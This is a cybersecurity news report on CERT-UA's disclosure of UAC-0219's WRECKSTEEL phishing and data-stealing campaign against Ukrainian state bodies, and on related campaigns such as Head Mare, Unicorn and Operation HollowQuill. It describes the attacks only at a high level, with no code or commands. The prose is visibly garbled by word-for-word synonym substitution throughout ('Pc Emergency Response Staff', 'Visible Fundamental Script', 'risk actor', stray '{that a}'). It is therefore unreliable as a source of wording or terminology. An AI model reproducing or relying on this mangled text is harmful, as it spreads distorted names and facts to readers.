The Pc Emergency Response Staff of Ukraine (CERT-UA) has revealed that at least three cyber assaults had been recorded towards state administration our bodies and important infrastructure services within the nation with an purpose to steal delicate knowledge.
The marketing campaign, the company mentioned, concerned using compromised e-mail accounts to ship phishing messages containing hyperlinks pointing to reliable companies like DropMeFiles and Google Drive. In some situations, the hyperlinks are embedded inside PDF attachments.
The digital missives sought to induce a false sense of urgency by claiming {that a} Ukrainian authorities company deliberate to chop salaries, urging the recipient to click on on the hyperlink to view the listing of affected staff.
Visiting these hyperlinks results in the obtain of a Visible Fundamental Script (VBS) loader that is designed to fetch and execute a PowerShell script able to harvesting recordsdata matching a particular set of extensions and capturing screenshots.
The exercise, attributed to a risk cluster tracked as UAC-0219, is alleged to have been ongoing since a minimum of fall 2024, with early iterations utilizing a mixture of EXE binaries, a VBS stealer, and a reliable picture editor software program known as IrfanView to appreciate its objectives.
CERT-UA has given the VBS loader and the PowerShell malware the moniker WRECKSTEEL. The assaults haven’t been attributed to any nation.
The cyber assaults comply with the invention of a phishing marketing campaign that has targeted on protection and aerospace entities with hyperlinks to the continued battle in Ukraine to reap webmail credentials by way of pretend login pages.
“The attackers seem to have constructed the web page utilizing Mailu, an open-source mail server software program accessible on GitHub,” the DomainTools Investigations (DTI) crew mentioned.
“The deal with spoofing organizations concerned in Ukraine’s protection and telecommunications infrastructure additional suggests an intent to assemble intelligence associated to the battle in Ukraine. Notably, lots of the spoofed protection, aerospace, and IT firms have supplied assist to Ukraine’s navy efforts in its battle with Russia.”
Russia-aligned intrusion units reminiscent of UAC-0050 and UAC-0006 have additionally been noticed finishing up financially and espionage motivated spam campaigns for the reason that begin of 2025, primarily concentrating on numerous verticals reminiscent of governments, protection, vitality, and NGOs, to distribute malware households like sLoad, Remcos RAT, NetSupport RAT, and SmokeLoader.
The event comes as Kaspersky warned that the risk actor referred to as Head Mare has focused a number of Russian entities with a malware referred to as PhantomPyramid that is able to processing directions issued by the operator over a command-and-control (C2) server, in addition to downloading and working extra payloads like MeshAgent.
Russian vitality firms, industrial enterprises, and suppliers and builders of digital parts organizations have additionally been on the receiving finish of phishing assaults mounted by a risk actor codenamed Unicorn that dropped a VBS trojan designed to siphon recordsdata and pictures from contaminated hosts.
Late final month, SEQRITE Labs revealed that educational, governmental, aerospace, and defense-related networks in Russia are being focused by weaponized decoy paperwork, doubtless despatched by way of phishing emails, as a part of a marketing campaign dubbed Operation HollowQuill. The assaults are believed to have began round December 2024.
The exercise makes use of social engineering ploys, disguising malware-laced PDFs as analysis invites and authorities communiqués to entice unsuspecting customers into triggering the assault chain.
“The risk entity delivers a malicious RAR file which accommodates a .NET malware dropper, which additional drops a Golang-based shellcode loader together with the reliable OneDrive utility and a decoy-based PDF with a closing Cobalt Strike payload,” safety researcher Subhajeet Singha mentioned.
